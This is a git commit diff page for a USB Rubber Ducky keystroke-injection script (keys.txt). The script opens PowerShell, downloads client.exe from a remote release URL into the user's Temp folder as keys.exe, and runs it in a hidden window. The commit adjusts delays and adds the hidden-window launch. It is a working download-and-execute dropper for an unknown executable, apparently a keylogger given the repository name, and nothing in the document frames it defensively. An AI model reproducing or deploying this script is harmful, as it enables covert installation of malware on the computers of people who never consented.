🐛 Fixes rubber ducky script
This commit is contained in:
parent
647ece6a43
commit
28883c620d
16
keys.txt
16
keys.txt
@ -1,19 +1,15 @@
|
|||||||
REM open powershell
|
REM open powershell
|
||||||
WIN R
|
GUI r
|
||||||
|
DELAY 1000
|
||||||
STRING powershell
|
STRING powershell
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 1000
|
DELAY 2000
|
||||||
|
|
||||||
REM download client.exe file
|
REM download client.exe file
|
||||||
STRING Invoke-WebRequest https://gitea.svitan.dev/Streamer272/keys/releases/download/v1.0.0/client.exe -OutFile .\AppData\Local\Temp\keys.exe
|
STRING Invoke-WebRequest https://gitea.svitan.dev/Streamer272/keys/releases/download/v1.0.0/client.exe -OutFile .\AppData\Local\Temp\keys.exe
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 13000
|
DELAY 15000
|
||||||
|
|
||||||
RUN client.exe file
|
REM client.exe file (closes automatically)
|
||||||
STRING Start-Process -FilePath .\AppData\Local\Temp\keys.exe -NoNewWindow
|
STRING powershell.exe -WindowStyle hidden { Start-Process -FilePath .\AppData\Local\Temp\keys.exe -NoNewWindow }
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
|
||||||
|
|
||||||
RUN close powershell
|
|
||||||
STRING exit
|
|
||||||
ENTER
|
ENTER
|
||||||
|
Loading…
x
Reference in New Issue
Block a user